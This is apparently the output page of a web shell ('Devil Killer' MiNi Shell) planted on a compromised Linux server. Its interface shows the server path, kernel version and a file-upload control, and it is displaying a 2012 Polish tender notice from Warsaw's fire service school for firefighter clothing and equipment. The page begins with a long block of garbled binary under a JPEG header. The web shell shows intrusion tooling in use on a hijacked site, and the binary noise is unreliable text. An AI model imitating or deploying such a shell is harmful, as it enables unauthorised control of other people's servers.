JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120619/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120619/209558-N-2012.html

<p class="kh_header"><b>Warszawa: Odzież specjalna i środki ochrony indywidualnej użytkowane w Państwowej Straży Pożarnej</b><br>
<b>Numer ogłoszenia: 209558 - 2012; data zamieszczenia: 19.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Główna Służby Pożarniczej , ul. Słowackiego 52/54, 01-629 Warszawa, woj. mazowieckie, tel. 022 5617624, faks 022 8330724.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sgsp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odzież specjalna i środki ochrony indywidualnej użytkowane w Państwowej Straży Pożarnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa do siedziby Zamawiającego odzieży specjalnej i środków ochrony indywidualnej użytkowanych w Państwowej Straży Pożarnej, w tym:
część I: Rękawice specjalne
część II: Kominiarka
część III: Buty strażackie
część IV: Hełm strażacki
część V: Zatrzaśnik strażacki duży 
część VI: Pas strażacki 
część VII: Topór strażacki lekki
część VIII: Pochewka na toporek
część IX: Podpinka linkowa
część X: Ubrania koszarowe
część XI: Obuwie koszarowe
część XII: Ubranie dla kadry dowódczo - sztabowej
część XIII: Buty dla kadry dowódczo - sztabowej
część XIV: Sztormiak
część XV: Koszulki letnie i koszulki zimowe
część XVI: Worek marynarski
część XVII: Plecak kostka - khaki
część XVIII: Manierka
część XIX: Menażka

Szczegółowy opis przedmiotu zamówienia znajduje się w Rozdziale II SIWZ Opis szczegółowy przedmiotu zamówienia i został określony szczegółowo dla każdej z 19-tu części oddzielnie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6, 35.81.20.00-9, 35.81.11.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1) Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium na wskazane części zamówienia w wysokości: 
- część I:	- Rękawice specjalne	700,00 zł      (słownie: siedemset złotych)
- część III:	- Buty strażackie	1500, 00 zł   (słownie: tysiąc pięćset złotych)
- część IV:	- Hełm strażacki	1700, 00 zł   (słownie: tysiąc siedemset złotych)
- część X:	- Ubrania koszarowe	2300, 00 zł   (słownie: dwa tysiące trzysta złotych)
Na pozostałe części zamówienia nie wymaga się wniesienia wadium.

2) Wadium może być wniesione w następujących formach:
- pieniądzu, na rachunek bankowy nr 68 1030 1508 0000 0008 1630 1084 w BH 
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
3) Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowych lub gwarancji ubezpieczeniowych należy złożyć w oryginale w siedzibie Zamawiającego w Kancelarii Ogólnej SGSP - pok. 102 (patrz pkt. 6 - Składanie ofert) 
4)Wadium musi być wniesione najpóźniej do dnia 27.06.2012 r., do godz. 1000 tj. przed upływem terminu składania ofert, co musi zostać udokumentowane stosownym załącznikiem do oferty.
5) Wadium wniesione w terminie późniejszym niż określony w pkt. 4. zostanie uznane za wniesione po terminie i skutkować będzie wykluczeniem Wykonawcy z postępowania.
6)   Dyspozycja w zakresie zwrotu wadium określona została w art. 46 Ustawy Pzp.
7) Wykonawca, który nie wniesie wadium na zasadach określonych w SIWZ zostanie wykluczony z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunków, o których mowa w pkt. III.3.1) zamawiający żąda od wykonawców załączenia do oferty
 
a) oświadczenia, którego treść stanowi załącznik nr 2 do SIWZ,

b) dokumentu potwierdzającego uprawnienia do realizowania dostaw produktów objętych przedmiotem zamówienia , np. 
Odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2). Dla spełniania w/w warunków Wykonawcy mogą korzystać z zasobów innych podmiotów na warunkach określonych w art. 26 ust. 2b Pzp odpowiednio to udowadniając.

3). Zamawiający dokonując oceny spełniania warunków przez wykonawców na podstawie otrzymanych dokumentów/oświadczeń, wykorzystuje odpowiednio procedurę uzupełniania i wyjaśnień określoną w art. 26 ust. 3 i 4 Pzp. Ostateczna ocena sprowadza się do stwierdzenia spełnia - nie spełnia.

4). Nie wykazanie przez wykonawców spełnienia warunków udziału w postępowaniu podlega wykluczeniu wykonawcy w trybie art. 24 ust.2 pkt. 4.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunków, o których mowa w pkt. III.3.2) zamawiający żąda od wykonawców załączenia do oferty
 
a) oświadczenia, którego treść stanowi załącznik nr 2 do SIWZ,

2). Dla spełniania w/w warunków Wykonawcy mogą korzystać z zasobów innych podmiotów na warunkach określonych w art. 26 ust. 2b Pzp odpowiednio to udowadniając.

3). Zamawiający dokonując oceny spełniania warunków przez wykonawców na podstawie otrzymanych dokumentów/oświadczeń, wykorzystuje odpowiednio procedurę uzupełniania i wyjaśnień określoną w art. 26 ust. 3 i 4 Pzp. Ostateczna ocena sprowadza się do stwierdzenia spełnia - nie spełnia.

4). Nie wykazanie przez wykonawców spełnienia warunków udziału w postępowaniu podlega wykluczeniu wykonawcy w trybie art. 24 ust.2 pkt. 4.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunków, o których mowa w pkt. III.3.3) zamawiający żąda od wykonawców załączenia do oferty
 
a) oświadczenia, którego treść stanowi załącznik nr 2 do SIWZ,

2). Dla spełniania w/w warunków Wykonawcy mogą korzystać z zasobów innych podmiotów na warunkach określonych w art. 26 ust. 2b Pzp odpowiednio to udowadniając.

3). Zamawiający dokonując oceny spełniania warunków przez wykonawców na podstawie otrzymanych dokumentów/oświadczeń, wykorzystuje odpowiednio procedurę uzupełniania i wyjaśnień określoną w art. 26 ust. 3 i 4 Pzp. Ostateczna ocena sprowadza się do stwierdzenia spełnia - nie spełnia.

4). Nie wykazanie przez wykonawców spełnienia warunków udziału w postępowaniu podlega wykluczeniu wykonawcy w trybie art. 24 ust.2 pkt. 4.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunków, o których mowa w pkt. III.3.4) zamawiający żąda od wykonawców załączenia do oferty
 
a) oświadczenia, którego treść stanowi załącznik nr 2 do SIWZ,

2). Dla spełniania w/w warunków Wykonawcy mogą korzystać z zasobów innych podmiotów na warunkach określonych w art. 26 ust. 2b Pzp odpowiednio to udowadniając.

3). Zamawiający dokonując oceny spełniania warunków przez wykonawców na podstawie otrzymanych dokumentów/oświadczeń, wykorzystuje odpowiednio procedurę uzupełniania i wyjaśnień określoną w art. 26 ust. 3 i 4 Pzp. Ostateczna ocena sprowadza się do stwierdzenia spełnia - nie spełnia.

4). Nie wykazanie przez wykonawców spełnienia warunków udziału w postępowaniu podlega wykluczeniu wykonawcy w trybie art. 24 ust.2 pkt. 4.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunków, o których mowa w pkt. III.3.5) zamawiający żąda od wykonawców załączenia do oferty
 
a) oświadczenia, którego treść stanowi załącznik nr 2 do SIWZ,

2). Dla spełniania w/w warunków Wykonawcy mogą korzystać z zasobów innych podmiotów na warunkach określonych w art. 26 ust. 2b Pzp odpowiednio to udowadniając.

3). Zamawiający dokonując oceny spełniania warunków przez wykonawców na podstawie otrzymanych dokumentów/oświadczeń, wykorzystuje odpowiednio procedurę uzupełniania i wyjaśnień określoną w art. 26 ust. 3 i 4 Pzp. Ostateczna ocena sprowadza się do stwierdzenia spełnia - nie spełnia.

4). Nie wykazanie przez wykonawców spełnienia warunków udziału w postępowaniu podlega wykluczeniu wykonawcy w trybie art. 24 ust.2 pkt. 4.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Dowód wniesienia w wyznaczonym terminie wadium, tj. np. kserokopia przelewu bankowego lub gwarancji ubezpieczeniowej (jeżeli dotyczy).

Ponadto, w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym w rozdziale II SIWZ Opis szczegółowy przedmioty zamówienia, Wykonawcy do oferty muszą załączyć:
Wymagany dokument:
1.  Aktualne świadectwo dopuszczenia wyrobu do użytkowania wydane przez CNBOP w Józefowie, zgodne z §6 Rozporządzenia MSWiA z dnia 20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.) - dotyczy części I - VII.
2. Deklaracja zgodności WE dla oferowanego produktu, sporządzona zgodnie z § 36 rozporządzenia Ministra Gospodarki z dnia 21 grudnia 2005 r. w sprawie zasadniczych wymagań dla środków ochrony indywidualnej  (Dz. U. z 2005 r. Nr 259, poz. 2173) - dotyczy części I -  V.
3. Oświadczenie Wykonawcy dotyczące oferowanych wyrobów, które stanowi załącznik nr 4 do SIWZ - dotyczy części X - XV.

Na etapie odbioru przedmiotu umowy, Wykonawca, którego oferta zostanie wybrana za najkorzystniejszą i zostanie z nim zawarta umowa, będzie zobowiązany złożyć (w oryginale lub kserokopię poświadczoną za zgodność z oryginałem): 

1. Certyfikat oceny typu WE wydany przez jednostkę notyfikowaną właściwą dla danego środka ochrony indywidualnej - dotyczy części I-V.
2. Ostatnie sprawozdanie z badań przeprowadzone w ramach sprawowania nadzoru nad certyfikatem WE przez jednostkę  notyfikowaną, z którą została zawarta umowa o której mowa w pkt. 2, zgodnie z § 40 lub § 41 rozporządzenia Ministra Gospodarki z dnia 21 grudnia 2005 r. - dotyczy części I-V
3. Instrukcję użytkowania , przechowywania i konserwacji wykonaną zgodnie z obowiązującymi przepisami dla oferowanego produktu.
4. Dopuszczenie do kontaktu z żywnością - dot. części XVIII i XIX.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmiany  istotnych postanowień zawartej umowy, w stosunku do treści oferty, w zakresie: 
1) ustawowej zmiany stawki podatku VAT.
2) terminu realizacji przedmiotu zamówienia - gdy wystąpi konieczność zmiany terminu w związku z wydłużającym się postępowaniem lub zaistnieją okoliczności mające wpływ na termin realizacji, a których nie udało się przewidzieć w chwili zawarcia umowy.
3) parametrów technicznych przedmiotu zamówienia - w przypadku gdy zmiany te będą korzystniejsze dla zamawiającego
Powyższe zmiany będą dopuszczalne, przy założeniu, że nie ulegnie zmianie cena ofertowa.  Każda ewentualna zmiana wymagać będzie odrębnego rozpatrzenia i zasadności jej wprowadzenia oraz wymagać będzie formy aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sgsp.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego, Warszawa ul. Słowackiego 52/54 - Dział Zamówień Publicznych (pokój 323) Obiekt 02 (wejście od ul. Siemiradzkiego).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2012 godzina 10:00, miejsce: Warszawa ul. Słowackiego 52/54 - Kancelaria Ogólna SGSP pokój 102 - wejście od ul. Siemiradzkiego..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rękawice specjalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonane zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.7. Rękawice specjalne określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. Poz. 1002 z późn. zm.).
Ilość: 150 par

Wyrób powinien spełniać wymagania obowiązujących norm scharmonizowanych w tym:
- PN- EN 659 + A1,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kominiarka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonane zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.8. Kominiarki określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. Poz. 1002 z późn. zm.).
Ilość 90 szt.

Wyrób powinien spełniać wymagania obowiązujących norm scharmonizowanych w tym:
- PN-EN 13911.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Buty strażackie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonane zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.9. Buty Strażackie określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych 
i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. Poz. 1002 z późn. zm.).
Z wariantowych wymagań wybiera się:
- sznurowane z systemem wiązań i zamków błyskawicznych, zapewniającym dopasowanie obuwia do nóg użytkownika.
- wykonane ze skóry w kolorze czarnym

Ponadto:
- buty z membraną wodoodporną, 
- sznurowadła wykonane z materiałów niepalnych - włókna aramidowe lub równoważne,
- zamek błyskawiczny z mechanizmem blokującym,
- muszą posiadać oznakowanie elementami z taśm odblaskowych w kolorze srebrnym i fluorescencyjnym żółtym. Taśmy ostrzegawcze powinny być wykonane z materiału o tych samych parametrach co taśmy w ubraniach specjalnych wg pkt. 1.6.
- muszą posiadać system odprowadzania wilgoci z przestrzeni pomiędzy skórą i membraną,
- muszą posiadać metalowy lub inny równorzędny podnosek chroniący palce przed zgnieceniem oraz stalową lub równoważną międzypodeszwę w całej długości podeszwy chroniącą stopę przed przebiciem,
- podeszwa wykonana z gumy, posiadająca samoczyszczący profil, odporna na działanie oleju napędowego, etyliny. Urzeźbienie podeszwy powinno być takie, żeby nie było ciągłych prostoliniowych rowków przecinających poprzecznie podeszwę o wysokości nie mniejszej niż 3mm, w śródstopiu poprzeczne urzeźbienie, którego wysokość powinna wynosić co najmniej 1,5 mm,
- minimum 1 przegub (amortyzator) nad piętą ułatwiający ruch stopy.


Wyrób powinien spełniać wymagania obowiązujących norm scharmonizowanych w tym:
- PN-EN 15090 
- PN-90/0-91123

Ilość: 120 par.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Hełm strażacki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: 100 szt.

Opis hełmu:
Wykonany zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.10. Hełmy strażackie określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych 
i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. Poz. 1002 z późn. zm.).

Wyrób powinien spełniać wymagania obowiązujących norm scharmonizowanych w tym:
PN-EN 443

Z wariantowych wymagań wybiera się:
- kolor czerwony,
- osłona karku  wykonana z tkaniny (niemetalizowanej),
- osłona twarzy i oczu (przyłbica) chowana wewnątrz skorupy.

Wymagane wyposażenie dodatkowe:
1) zaczepy do współpracy z nahełmowymi maskami aparatów oddechowych,
2) gniazdo, uchwyt - do zamocowania latarki,

Ponadto:
Zamiast wymaganego numeru JRG, którego Szkoła nie posiada, na czołowej stronie czerepu powinno być umieszczone Logo Zamawiającego wg podanego wzoru.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zatrzaśnik strażacki duży.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: 80 szt.

Opis:
Zatrzaśnik strażacki duży: Wykonany zgodnie z wymaganiami techniczno - użytkowymi    pkt. 5.6. Zatrzaśniki określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
